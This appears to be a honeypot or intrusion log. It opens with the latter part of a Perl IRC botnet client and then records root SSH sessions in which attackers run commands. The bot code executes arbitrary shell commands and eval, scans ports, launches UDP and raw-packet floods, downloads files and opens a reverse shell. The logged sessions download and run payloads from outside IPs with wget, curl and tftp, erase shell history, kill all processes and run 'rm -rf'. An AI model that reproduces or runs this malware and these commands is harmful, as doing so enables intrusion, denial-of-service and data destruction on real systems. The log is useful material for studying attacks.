              . "User-Agent: $AGENT/$VERSION/u\015\012";
  $request .= "Pragma: no-cache\015\012" if ($main::http_no_cache);
  $request .= "\015\012";
  print $sock $request;

  my $buf = "";
  my $n;
  my $b1 = "";
  while ($n = sysread($sock, $buf, 8*1024, length($buf))) {
    if ($b1 eq "") { 
      $b1 = $buf;         
      $buf =~ s/.+?\015?\012\015?\012//s;      
    }
    if ($http_stream_out) { print GET_OUTFILE $buf; $buf = ""; }
  }
  return undef unless defined($n);

  $main::http_get_result = 200;
  if ($b1 =~ m,^HTTP/\d+\.\d+\s+(\d+)[^\012]*\012,) {
    $main::http_get_result = $1;
    if ($main::http_get_result =~ /^30[1237]/ && $b1 =~ /\012Location:\s*(\S+)/
) {
      my $url = $1;
      return undef if $http_loop_check{$url}++;
      return _get($url);
    }
    return undef unless $main::http_get_result =~ /^2/;
  }

  return $buf;
}

$sel_cliente = IO::Select->new();
sub sendraw {
  if ($#_ == '1') {
    my $socket = $_[0];
    print $socket "$_[1]\n";
  } else {
      print $IRC_cur_socket "$_[0]\n";
  }
}

sub conectar {
   my $meunick = $_[0];
   my $servidor_con = $_[1];
   my $porta_con = $_[2];

   my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$servidor_con", PeerPort=>$porta_con) or return(1);
   if (defined($IRC_socket)) {
     $IRC_cur_socket = $IRC_socket;

     $IRC_socket->autoflush(1);
     $sel_cliente->add($IRC_socket);

     $irc_servers{$IRC_cur_socket}{'host'} = "$servidor_con";
     $irc_servers{$IRC_cur_socket}{'porta'} = "$porta_con";
     $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
     $irc_servers{$IRC_cur_socket}{'meuip'} = $IRC_socket->sockhost;
     nick("$meunick");
     sendraw("USER $ircname ".$IRC_socket->sockhost." $servidor_con :$realname");
     sleep 2;
   }

}
my $line_temp;
while( 1 ) {
   while (!(keys(%irc_servers))) { conectar("$nick", "$servidor", "$porta"); }
   delete($irc_servers{''}) if (defined($irc_servers{''}));
   &DCC::connections;
   my @ready = $sel_cliente->can_read(0.6);
   next unless(@ready);
   foreach $fh (@ready) {
     $IRC_cur_socket = $fh;
     $meunick = $irc_servers{$IRC_cur_socket}{'nick'};
     $nread = sysread($fh, $msg, 4096);
     if ($nread == 0) {
        $sel_cliente->remove($fh);
        $fh->close;
        delete($irc_servers{$fh});
     }
     @lines = split (/\n/, $msg);

     for(my $c=0; $c<= $#lines; $c++) {
       $line = $lines[$c];
       $line=$line_temp.$line if ($line_temp);
       $line_temp='';
       $line =~ s/\r$//;
       unless ($c == $#lines) {
         parse("$line");
       } else {
           if ($#lines == 0) {
             parse("$line");
           } elsif ($lines[$c] =~ /\r$/) {
               parse("$line");
           } elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) {
               parse("$line");
           } else {
               $line_temp = $line;
           }
       }
      }
   }
}

sub parse {
   my $servarg = shift;
   if ($servarg =~ /^PING \:(.*)/) {
     sendraw("PONG :$1");
   } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
       my $pn=$1; my $onde = $4; my $args = $5;
       if ($args =~ /^\001VERSION\001$/) {
         notice("$pn", "\001VERSION mIRC v6.16 ENE ALIN GABRIEL\001");
       }
       elsif ($args =~ /^\001PING\s+(\d+)\001$/) {
         notice("$pn", "\001PONG\001");
       }
       elsif (grep {$_ =~ /^\Q$pn\E$/i } @adms) {
         if ($onde eq "$meunick"){
           shell("$pn", "$args");
           }
         elsif ($args =~ /^(\Q$meunick\E|\Q$prefixo\E)\s+(.*)/ ) {
            my $natrix = $1;
            my $arg = $2;
            if ($arg =~ /^\!(.*)/) {
              ircase("$pn","$onde","$1") unless ($natrix eq "$prefixo" and $arg =~ /^\!nick/);
            } elsif ($arg =~ /^\@(.*)/) {
                $ondep = $onde;
                $ondep = $pn if $onde eq $meunick;
                bfunc("$ondep","$1");
            } else {
                shell("$onde", "$arg");
            }
         }
       }
   } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {
       if (lc($1) eq lc($meunick)) {
         $meunick=$4;
         $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
       }
   } elsif ($servarg =~ m/^\:(.+?)\s+433/i) {
       $meunick = getnick();
       nick("$meunick");
   } elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {
       $meunick = $2;
       $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
       $irc_servers{$IRC_cur_socket}{'nome'} = "$1";
       foreach my $canal (@canais) {
         sendraw("JOIN $canal");
       }
   }
}

sub bfunc {
  my $printl = $_[0];
  my $funcarg = $_[1];
  if (my $pid = fork) {
     waitpid($pid, 0);
  } else {
      if (fork) {
         exit;
       } else {
           if ($funcarg =~ /^portscan (.*)/) {
             my $hostip="$1";
             my @portas=("21","22","23","25","53","80","110","143","6665");
             my (@aberta, %porta_banner);
             foreach my $porta (@portas)  {
                my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto => 'tcp', Timeout => 4);
                if ($scansock) {
                   push (@aberta, $porta);
                   $scansock->close;
                }
             }
             if (@aberta) {
               sendraw($IRC_cur_socket, "PRIVMSG $printl :Portas abertas: @aberta");
             } else {
                 sendraw($IRC_cur_socket,"PRIVMSG $printl :Nenhuma porta aberta foi encontrada.");
             }
           }

           elsif ($funcarg =~ /^download\s+(.*)\s+(.*)/) {
            getstore("$1", "$2");
            sendraw($IRC_cur_socket, "PRIVMSG $printl :Download de $2 ($1) Conclu.do!") if ($estatisticas);
            }

           elsif ($funcarg =~ /^fullportscan\s+(.*)\s+(\d+)\s+(\d+)/) {
             my $hostname="$1";
             my $portainicial = "$2";
             my $portafinal = "$3";
             my (@abertas, %porta_banner);
             foreach my $porta ($portainicial..$portafinal)
             {
               my $scansock = IO::Socket::INET->new(PeerAddr => $hostname, PeerPort => $porta, Proto => 'tcp', Timeout => 4);
               if ($scansock) {
                 push (@abertas, $porta);
                 $scansock->close;
                 if ($estatisticas) {
                   sendraw($IRC_cur_socket, "PRIVMSG $printl :Porta $porta aberta em $hostname");
                 }
               }
             }
             if (@abertas) {
               sendraw($IRC_cur_socket, "PRIVMSG $printl :Portas abertas: @abertas");
             } else {
               sendraw($IRC_cur_socket,"PRIVMSG $printl :Nenhuma porta aberta foi encontrada.");
             }
            }

            elsif ($funcarg =~ /^udp\s+(.*)\s+(\d+)\s+(\d+)/) {
              return unless $pacotes;
              socket(Tr0x, PF_INET, SOCK_DGRAM, 17);
              my $alvo=inet_aton("$1");
              my $porta = "$2";
              my $tempo = "$3";
              my $pacote;
              my $pacotese;
              my $fim = time + $tempo;
              my $pacota = 1;
              while (($pacota == "1") && ($pacotes == "1")) {
                $pacota = 0 if ((time >= $fim) && ($tempo != "0"));
                $pacote=$rand x $rand x $rand;
                $porta = int(rand 65000) +1 if ($porta == "0");
                send(Tr0x, 0, $pacote, sockaddr_in($porta, $alvo)) and $pacotese++ if ($pacotes == "1");
              }
              if ($estatisticas)
              {
               sendraw($IRC_cur_socket, "PRIVMSG $printl :\002Tempo de Pacotes\002: $tempo"."s");
               sendraw($IRC_cur_socket, "PRIVMSG $printl :\002Total de Pacotes\002: $pacotese");
               sendraw($IRC_cur_socket, "PRIVMSG $printl :\002Alvo dos Pacotes\002: $1");
              }
            }

            elsif ($funcarg =~ /^udpfaixa\s+(.*)\s+(\d+)\s+(\d+)/) {
              return unless $pacotes;
              socket(Tr0x, PF_INET, SOCK_DGRAM, 17);
              my $faixaip="$1";
              my $porta = "$2";
              my $tempo = "$3";
              my $pacote;
              my $pacotes;
              my $fim = time + $tempo;
              my $pacota = 1;
              my $alvo;
              while ($pacota == "1") {
                $pacota = 0 if ((time >= $fim) && ($tempo != "0"));
                for (my $faixa = 1; $faixa <= 255; $faixa++) {
                  $alvo = inet_aton("$faixaip.$faixa");
                  $pacote=$rand x $rand x $rand;
                  $porta = int(rand 65000) +1 if ($porta == "0");
                  send(Tr0x, 0, $pacote, sockaddr_in($porta, $alvo)) and $pacotese++ if ($pacotes == "1");
                  if ($faixa >= 255) {
                    $faixa = 1;
                  }
                }
              }
              if ($estatisticas)
              {
               sendraw($IRC_cur_socket, "PRIVMSG $printl :\002Tempo de Pacotes\002: $tempo"."s");
               sendraw($IRC_cur_socket, "PRIVMSG $printl :\002Total de Pacotes\002: $pacotese");
               sendraw($IRC_cur_socket, "PRIVMSG $printl :\002Alvo dos Pacotes\002: $alvo");
              }
            }

            elsif ($funcarg =~ /^conback\s+(.*)\s+(\d+)/) {
              my $host = "$1";
              my $porta = "$2";
              my $proto = getprotobyname('tcp');
              my $iaddr = inet_aton($host);
              my $paddr = sockaddr_in($porta, $iaddr);
              my $shell = "/bin/sh -i";
              if ($^O eq "MSWin32") {
                $shell = "cmd.exe";
              }
              socket(SOCKET, PF_INET, SOCK_STREAM, $proto) or die "socket: $!";
              connect(SOCKET, $paddr) or die "connect: $!";
              open(STDIN, ">&SOCKET");
              open(STDOUT, ">&SOCKET");
              open(STDERR, ">&SOCKET");
              system("$shell");
              close(STDIN);
              close(STDOUT);
              close(STDERR);

              if ($estatisticas)
              {
               sendraw($IRC_cur_socket, "PRIVMSG $printl :\002Conectando-se em\002: $host:$porta");
              }
            }

           elsif ($funcarg =~ /^oldpack\s+(.*)\s+(\d+)\s+(\d+)/) {
            return unless $pacotes;
             my ($dtime, %pacotes) = attacker("$1", "$2", "$3");
             $dtime = 1 if $dtime == 0;
             my %bytes;
             $bytes{igmp} = $2 * $pacotes{igmp};
             $bytes{icmp} = $2 * $pacotes{icmp};
             $bytes{o} = $2 * $pacotes{o};
             $bytes{udp} = $2 * $pacotes{udp};
             $bytes{tcp} = $2 * $pacotes{tcp};
             unless ($estatisticas)
             {
               sendraw($IRC_cur_socket, "PRIVMSG $printl :\002 - Status -\002");
               sendraw($IRC_cur_socket, "PRIVMSG $printl :\002Timp\002: $dtime"."secunde.");
               sendraw($IRC_cur_socket, "PRIVMSG $printl :\002Total packet\002: ".($pacotes{udp} + $pacotes{igmp} + $pacotes{icmp} +  $pacotes{o}));
               sendraw($IRC_cur_socket, "PRIVMSG $printl :\002Total bytes\002: ".($bytes{icmp} + $bytes {igmp} + $bytes{udp} + $bytes{o}));
               sendraw($IRC_cur_socket, "PRIVMSG $printl :\002Flood\002: ".int((($bytes{icmp}+$bytes{igmp}+$bytes{udp} + $bytes{o})/1024)/$dtime)." kbps");
             }
           }
           exit;
       }
  }
}

sub ircase {
  my ($kem, $printl, $case) = @_;

   if ($case =~ /^join (.*)/) {
     j("$1");
   }
   elsif ($case =~ /^part (.*)/) {
      p("$1");
   }
   elsif ($case =~ /^rejoin\s+(.*)/) {
      my $chan = $1;
      if ($chan =~ /^(\d+) (.*)/) {
        for (my $ca = 1; $ca <= $1; $ca++ ) {
          p("$2");
          j("$2");
        }
      } else {
          p("$chan");
          j("$chan");
      }
   }
   elsif ($case =~ /^op/) {
      op("$printl", "$kem") if $case eq "op";
      my $oarg = substr($case, 3);
      op("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
   }
   elsif ($case =~ /^deop/) {
      deop("$printl", "$kem") if $case eq "deop";
      my $oarg = substr($case, 5);
      deop("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
   }
   elsif ($case =~ /^voice/) {
      voice("$printl", "$kem") if $case eq "voice";
      $oarg = substr($case, 6);
      voice("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
   }
   elsif ($case =~ /^devoice/) {
      devoice("$printl", "$kem") if $case eq "devoice";
      $oarg = substr($case, 8);
      devoice("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
   }
   elsif ($case =~ /^msg\s+(\S+) (.*)/) {
      msg("$1", "$2");
   }
   elsif ($case =~ /^flood\s+(\d+)\s+(\S+) (.*)/) {
      for (my $cf = 1; $cf <= $1; $cf++) {
        msg("$2", "$3");
      }
   }
   elsif ($case =~ /^ctcpflood\s+(\d+)\s+(\S+) (.*)/) {
      for (my $cf = 1; $cf <= $1; $cf++) {
        ctcp("$2", "$3");
      }
   }
   elsif ($case =~ /^ctcp\s+(\S+) (.*)/) {
      ctcp("$1", "$2");
   }
   elsif ($case =~ /^invite\s+(\S+) (.*)/) {
      invite("$1", "$2");
   }
   elsif ($case =~ /^nick (.*)/) {
      nick("$1");
   }
   elsif ($case =~ /^conecta\s+(\S+)\s+(\S+)/) {
       conectar("$2", "$1", 6667);
   }
   elsif ($case =~ /^send\s+(\S+)\s+(\S+)/) {
      DCC::SEND("$1", "$2");
   }
   elsif ($case =~ /^raw (.*)/) {
      sendraw("$1");
   }
   elsif ($case =~ /^eval (.*)/) {
      eval "$1";
   }
   elsif ($case =~ /^entra\s+(\S+)\s+(\d+)/) {
    sleep int(rand($2));
    j("$1");
   }
   elsif ($case =~ /^sai\s+(\S+)\s+(\d+)/) {
    sleep int(rand($2));
    p("$1");
   }
   elsif ($case =~ /^sair/) {
     quit();
   }
   elsif ($case =~ /^novonick/) {
    my $novonick = getnick();
     nick("$novonick");
   }
   elsif ($case =~ /^estatisticas (.*)/) {
     if ($1 eq "on") {
      $estatisticas = 1;
      msg("$printl", "Estat.sticas ativadas!");
     } elsif ($1 eq "off") {
      $estatisticas = 0;
      msg("$printl", "Estat.sticas desativadas!");
     }
   }
   elsif ($case =~ /^pacotes (.*)/) {
     if ($1 eq "on") {
      $pacotes = 1;
      msg("$printl", "Pacotes ativados!") if ($estatisticas == "1");
     } elsif ($1 eq "off") {
      $pacotes = 0;
      msg("$printl", "Pacotes desativados!") if ($estatisticas == "1");
     }
   }
}
sub shell {
  return unless $acessoshell;
  my $printl=$_[0];
  my $comando=$_[1];
  if ($comando =~ /cd (.*)/) {
    chdir("$1") || msg("$printl", "Diret.rio inexistente!");
    return;
  }
  elsif ($pid = fork) {
     waitpid($pid, 0);
  } else {
      if (fork) {
         exit;
       } else {
           my @resp=`$comando 2>&1 3>&1`;
           my $c=0;
           foreach my $linha (@resp) {
             $c++;
             chop $linha;
             sendraw($IRC_cur_socket, "PRIVMSG $printl :$linha");
             if ($c >= "$linas_max") {
               $c=0;
               sleep $sleep;
             }
           }
           exit;
       }
  }
}

sub attacker {
  my $iaddr = inet_aton($_[0]);
  my $msg = 'B' x $_[1];
  my $ftime = $_[2];
  my $cp = 0;
  my (%pacotes);
  $pacotes{icmp} = $pacotes{igmp} = $pacotes{udp} = $pacotes{o} = $pacotes{tcp} = 0;

  socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++;
  socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++;
  socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++;
  socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++;
  return(undef) if $cp == 4;
  my $itime = time;
  my ($cur_time);
  while ( 1 ) {
     for (my $porta = 1; $porta <= 65535; $porta++) {
       $cur_time = time - $itime;
       last if $cur_time >= $ftime;
       send(SOCK1, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{igmp}++ if ($pacotes == 1);
       send(SOCK2, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{udp}++ if ($pacotes == 1);
       send(SOCK3, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{icmp}++ if ($pacotes == 1);
       send(SOCK4, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{tcp}++ if ($pacotes == 1);

       for (my $pc = 3; $pc <= 255;$pc++) {
         next if $pc == 6;
         $cur_time = time - $itime;
         last if $cur_time >= $ftime;
         socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next;
         send(SOCK5, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{o}++ if ($pacotes == 1);
       }
     }
     last if $cur_time >= $ftime;
  }
  return($cur_time, %pacotes);
}

sub action {
   return unless $#_ == 1;
   sendraw("PRIVMSG $_[0] :\001ACTION $_[1]\001");
}

sub ctcp {
   return unless $#_ == 1;
   sendraw("PRIVMSG $_[0] :\001$_[1]\001");
}
sub msg {
   return unless $#_ == 1;
   sendraw("PRIVMSG $_[0] :$_[1]");
}

sub notice {
   return unless $#_ == 1;
   sendraw("NOTICE $_[0] :$_[1]");
}

sub op {
   return unless $#_ == 1;
   sendraw("MODE $_[0] +o $_[1]");
}
sub deop {
   return unless $#_ == 1;
   sendraw("MODE $_[0] -o $_[1]");
}
sub hop {
    return unless $#_ == 1;
   sendraw("MODE $_[0] +h $_[1]");
}
sub dehop {
   return unless $#_ == 1;
   sendraw("MODE $_[0] +h $_[1]");
}
sub voice {
   return unless $#_ == 1;
   sendraw("MODE $_[0] +v $_[1]");
}
sub devoice {
   return unless $#_ == 1;
   sendraw("MODE $_[0] -v $_[1]");
}
sub ban {
   return unless $#_ == 1;
   sendraw("MODE $_[0] +b $_[1]");
}
sub unban {
   return unless $#_ == 1;
   sendraw("MODE $_[0] -b $_[1]");
}
sub kick {
   return unless $#_ == 1;
   sendraw("KICK $_[0] $_[1] :$_[2]");
}

sub modo {
   return unless $#_ == 0;
   sendraw("MODE $_[0] $_[1]");
}
sub mode { modo(@_); }

sub j { &join(@_); }
sub join {
   return unless $#_ == 0;
   sendraw("JOIN $_[0]");
}
sub p { part(@_); }
sub part {sendraw("PART $_[0]");}

sub nick {
  return unless $#_ == 0;
  sendraw("NICK $_[0]");
}

sub invite {
   return unless $#_ == 1;
   sendraw("INVITE $_[1] $_[0]");
}
sub topico {
   return unless $#_ == 1;
   sendraw("TOPIC $_[0] $_[1]");
}
sub topic { topico(@_); }

sub whois {
  return unless $#_ == 0;
  sendraw("WHOIS $_[0]");
}
sub who {
  return unless $#_ == 0;
  sendraw("WHO $_[0]");
}
sub names {
  return unless $#_ == 0;
  sendraw("NAMES $_[0]");
}
sub away {
  sendraw("AWAY $_[0]");
}
sub back { away(); }
sub quit {
  sendraw("QUIT :$_[0]");
  exit;
}

package DCC;

sub connections {
   my @ready = $dcc_sel->can_read(1);
   foreach my $fh (@ready) {
     my $dcctipo = $DCC{$fh}{tipo};
     my $arquivo = $DCC{$fh}{arquivo};
     my $bytes = $DCC{$fh}{bytes};
     my $cur_byte = $DCC{$fh}{curbyte};
     my $nick = $DCC{$fh}{nick};

     my $msg;
     my $nread = sysread($fh, $msg, 10240);

     if ($nread == 0 and $dcctipo =~ /^(get|sendcon)$/) {
        $DCC{$fh}{status} = "Cancelado";
        $DCC{$fh}{ftime} = time;
        $dcc_sel->remove($fh);
        $fh->close;
        next;
     }

     if ($dcctipo eq "get") {
        $DCC{$fh}{curbyte} += length($msg);

        my $cur_byte = $DCC{$fh}{curbyte};

        open(FILE, ">> $arquivo");
        print FILE "$msg" if ($cur_byte <= $bytes);
        close(FILE);

        my $packbyte = pack("N", $cur_byte);
        print $fh "$packbyte";

        if ($bytes == $cur_byte) {
           $dcc_sel->remove($fh);
           $fh->close;
           $DCC{$fh}{status} = "Recebido";
           $DCC{$fh}{ftime} = time;
           next;
        }
     } elsif ($dcctipo eq "send") {
          my $send = $fh->accept;
          $send->autoflush(1);
          $dcc_sel->add($send);
          $dcc_sel->remove($fh);
          $DCC{$send}{tipo} = 'sendcon';
          $DCC{$send}{itime} = time;
          $DCC{$send}{nick} = $nick;
          $DCC{$send}{bytes} = $bytes;
          $DCC{$send}{curbyte} = 0;
          $DCC{$send}{arquivo} = $arquivo;
          $DCC{$send}{ip} = $send->peerhost;
          $DCC{$send}{porta} = $send->peerport;
          $DCC{$send}{status} = "Enviando";

          open(FILE, "< $arquivo");
          my $fbytes;
          read(FILE, $fbytes, 1024);
          print $send "$fbytes";
          close FILE;
     } elsif ($dcctipo eq 'sendcon') {
          my $bytes_sended = unpack("N", $msg);
          $DCC{$fh}{curbyte} = $bytes_sended;
          if ($bytes_sended == $bytes) {
             $fh->close;
             $dcc_sel->remove($fh);
             $DCC{$fh}{status} = "Enviado";
             $DCC{$fh}{ftime} = time;
             next;
          }
          open(SENDFILE, "< $arquivo");
          seek(SENDFILE, $bytes_sended, 0);
          my $send_bytes;
          read(SENDFILE, $send_bytes, 1024);
          print $fh "$send_bytes";
          close(SENDFILE);
     }
   }
}

sub SEND {
  my ($nick, $arquivo) = @_;
  unless (-r "$arquivo") {
    return(0);
  }

  my $dccark = $arquivo;
  $dccark =~ s/[.*\/](\S+)/$1/;

  my $meuip = $::irc_servers{"$::IRC_cur_socket"}{'meuip'};
  my $longip = unpack("N",inet_aton($meuip));

  my @filestat = stat($arquivo);
  my $size_total=$filestat[7];
  if ($size_total == 0) {
     return(0);
  }

  my ($porta, $sendsock);
  do {
    $porta = int rand(64511);
    $porta += 1024;
    $sendsock = IO::Socket::INET->new(Listen=>1, LocalPort =>$porta, Proto => 'tcp') and $dcc_sel->add($sendsock);
  } until $sendsock;

  $DCC{$sendsock}{tipo} = 'send';
  $DCC{$sendsock}{nick} = $nick;
  $DCC{$sendsock}{bytes} = $size_total;
  $DCC{$sendsock}{arquivo} = $arquivo;

  &::ctcp("$nick", "DCC SEND $dccark $longip $porta $size_total");

}

sub GET {
  my ($arquivo, $dcclongip, $dccporta, $bytes, $nick) = @_;
  return(0) if (-e "$arquivo");
  if (open(FILE, "> $arquivo")) {
     close FILE;
  } else {
    return(0);
  }

  my $dccip=fixaddr($dcclongip);
  return(0) if ($dccporta < 1024 or not defined $dccip or $bytes < 1);
  my $dccsock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$dccip, PeerPort=>$dccporta, Timeout=>15) or return (0);
  $dccsock->autoflush(1);
  $dcc_sel->add($dccsock);
  $DCC{$dccsock}{tipo} = 'get';
  $DCC{$dccsock}{itime} = time;
  $DCC{$dccsock}{nick} = $nick;
  $DCC{$dccsock}{bytes} = $bytes;
  $DCC{$dccsock}{curbyte} = 0;
  $DCC{$dccsock}{arquivo} = $arquivo;
  $DCC{$dccsock}{ip} = $dccip;
  $DCC{$dccsock}{porta} = $dccporta;
  $DCC{$dccsock}{status} = "Recebendo";
}

sub Status {
  my $socket = shift;
  my $sock_tipo = $DCC{$socket}{tipo};
  unless (lc($sock_tipo) eq "chat") {
    my $nick = $DCC{$socket}{nick};
    my $arquivo = $DCC{$socket}{arquivo};
    my $itime = $DCC{$socket}{itime};
    my $ftime = time;
    my $status = $DCC{$socket}{status};
    $ftime = $DCC{$socket}{ftime} if defined($DCC{$socket}{ftime});

    my $d_time = $ftime-$itime;

    my $cur_byte = $DCC{$socket}{curbyte};
    my $bytes_total =  $DCC{$socket}{bytes};

    my $rate = 0;
    $rate = ($cur_byte/1024)/$d_time if $cur_byte > 0;
    my $porcen = ($cur_byte*100)/$bytes_total;

    my ($r_duv, $p_duv);
    if ($rate =~ /^(\d+)\.(\d)(\d)(\d)/) {
       $r_duv = $3; $r_duv++ if $4 >= 5;
       $rate = "$1\.$2"."$r_duv";
    }
    if ($porcen =~ /^(\d+)\.(\d)(\d)(\d)/) {
       $p_duv = $3; $p_duv++ if $4 >= 5;
       $porcen = "$1\.$2"."$p_duv";
    }
    return("$sock_tipo","$status","$nick","$arquivo","$bytes_total", "$cur_byte","$d_time", "$rate", "$porcen");
  }

  return(0);
}

sub fixaddr {
    my ($address) = @_;

    chomp $address;     
    if ($address =~ /^\d+$/) {
        return inet_ntoa(pack "N", $address);
    } elsif ($address =~ /^[12]?\d{1,2}\.[12]?\d{1,2}\.[12]?\d{1,2}\.[12]?\d{1,2}$/) {
        return $address;
    } elsif ($address =~ tr/a-zA-Z//) {                    
        return inet_ntoa(((gethostbyname($address))[4])[0]);
    } else {
        return;
    }
}
EOF | perl

From 95.146.86.10 13-Aug-2019 00:59:30 ssh2 root
Exec cat /proc/cpuinfo | grep name | wc -l

From 107.11.101.127 15-Aug-2019 07:12:38 ssh2 root
Exec echo 'cd /tmp || cd /var/run || cd /mnt || cd /root || cd / && rm *.sh; wget http://46.246.35.66/bin.sh || curl http://46.246.35.66/curl.sh -o curl.sh || tftp 46.246.35.66 -c get tftp.sh || tftp -r tftp.sh -g 46.246.35.66; chmod +x *.sh; ./bin.sh; ./curl.sh; ./tftp.sh' | sh
echo 'cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
rm *.sh
wget http://46.246.35.66/bin.sh || curl http://46.246.35.66/curl.sh -o curl.sh || tftp 46.246.35.66 -c get tftp.sh || tftp
chmod +x *.sh
./bin.sh
./curl.sh
./tftp.sh' | sh

From 91.211.244.92 16-Aug-2019 13:30:15 ssh2 root
Exec wget http://164.68.116.122/Apple.sh; chmod 777 Apple.sh; sh Apple.sh
wget http://164.68.116.122/Apple.sh
chmod 777 Apple.sh
sh Apple.sh

From 217.117.13.12 17-Aug-2019 15:36:18 ssh2 root
Exec echo 'cd /tmp || cd /var/run || cd /mnt || cd /root || cd / && rm *.sh; wget http://46.246.44.11/bin.sh || curl http://46.246.44.11/curl.sh -o curl.sh || tftp 46.246.44.11 -c get tftp.sh || tftp -r tftp.sh -g 46.246.44.11; chmod +x *.sh; ./bin.sh; ./curl.sh; ./tftp.sh' | sh
echo 'cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
rm *.sh
wget http://46.246.44.11/bin.sh || curl http://46.246.44.11/curl.sh -o curl.sh || tftp 46.246.44.11 -c get tftp.sh || tftp
chmod +x *.sh
./bin.sh
./curl.sh
./tftp.sh' | sh

From 82.78.159.115 18-Aug-2019 18:35:43 ssh2 root
ls
w
ps -x
cd /home
ls
passwd gtk
cd /var/tmp
ls
wget nasapaul.com/ninfo

From 82.78.159.115 18-Aug-2019 18:37:51 ssh2 root
rm -rf * .*
ls -a
ls
cd
ls
rm -rf * .*
ls
reboot
restart
halt
w
kill -9 -1
lscpu
free -mt

From 5.14.238.108 18-Aug-2019 18:45:31 ssh2 root
passwd
ls
w
clear
nproc
cd /var/tmp
ls
passwd
yum install passwd

From 62.121.123.253 18-Aug-2019 18:45:54 ssh2 root
apt install passwd
apt get install passwd
clear
ls
clear
cd /var/tmp
ls
exit
w

From 176.31.61.150 18-Aug-2019 18:46:56 ssh2 root
lscpu
passwd
w
passwd root
ls
mkdir .f
ls
w
perl
halt
shutdown
rm -rf

From 82.78.159.115 18-Aug-2019 18:51:52 ssh2 root
w
lscpu
passwd
halt

From 142.93.163.80 18-Aug-2019 19:03:52 ssh2 root
Exec uname -a ; lscpu
uname -a
lscpu
ls
w
cd /var/tmp
wget
wget fanelishere.tk/arhive/info
perl info
ls

From 82.44.38.115 18-Aug-2019 20:31:17 ssh2 root
ls
w
clear
ls
wget gamerloly.tk/Info
clear
apt
yum
sudo
halt
shutdown
kill -1 -1
exit

From 45.55.46.204 19-Aug-2019 02:56:39 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://91.209.70.174/ssh.sh; curl -O http://91.209.70.174/ssh.sh; chmod 777 ssh.sh; sh ssh.sh; tftp 91.209.70.174 -c get ssh2.sh; chmod 777 ssh2.sh; sh ssh2.sh; tftp -r ssh3.sh -g 91.209.70.174; chmod 777 ssh3.sh; sh ssh3.sh; ftpget -v -u anonymous -p anonymous -P 21 91.209.70.174 ssh4.sh ssh4.sh; sh ssh4.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://91.209.70.174/ssh.sh
curl -O http://91.209.70.174/ssh.sh
chmod 777 ssh.sh
sh ssh.sh
tftp 91.209.70.174 -c get ssh2.sh
chmod 777 ssh2.sh
sh ssh2.sh
tftp -r ssh3.sh -g 91.209.70.174
chmod 777 ssh3.sh
sh ssh3.sh
ftpget -v -u anonymous -p anonymous -P 21 91.209.70.174 ssh4.sh ssh4.sh
sh ssh4.sh
rm -rf *

From 5.14.237.39 19-Aug-2019 04:42:48 ssh2 root
w 
passwd
passwd root
w
halt
kill -9 -1
exit

From 5.14.238.108 19-Aug-2019 09:00:06 ssh2 root
ls
w
clear
nproc
exit

From 62.121.123.253 19-Aug-2019 09:14:01 ssh2 root
nproc
passwd
lscpu
wget
wget https://feds.host/skidshit/dongv3.zip
ls
cd
perl reglas.pl
cat Mail
cat nsmail
rm
rf
clear
ash

From 68.183.15.250 19-Aug-2019 11:42:03 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://51.81.20.95/dvrh31337; chmod 777 dvrh31337; sh dvrh31337
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://51.81.20.95/dvrh31337
chmod 777 dvrh31337
sh dvrh31337

From 31.30.120.136 19-Aug-2019 12:32:39 ssh2 root
Exec uname -a;unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH;history -n;export HISTFILE=/dev/null;export HISTSIZE=0;export HISTFILESIZE=0;killall -9 perl;cd /tmp;rm -rf zyk;echo 'wget -q --timeout=20 --tries=2 203.146.208.208/drago/images/.ssh/.ssh/zyk || curl --connect-timeout 20 -s -O -f 203.146.208.208/drago/images/.ssh/.ssh/zyk;perl zyk;rm -rf zyk plmx' >>plmx;chmod +x plmx;./plmx >/dev/null 2>&1 &

uname -a
unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH
history -n
export HISTFILE=/dev/null
export HISTSIZE=0
export HISTFILESIZE=0
killall -9 perl
cd /tmp
rm -rf zyk
echo 'wget -q --timeout=20 --tries=2 203.146.208.208/drago/images/.ssh/.ssh/zyk || curl --connect-timeout 20 -s -O -f 203.146.208.208/drago/images/.ssh/.ssh/zyk
perl zyk
rm -rf zyk plmx' >>plmx
chmod +x plmx
./plmx >/dev/null 2>
1
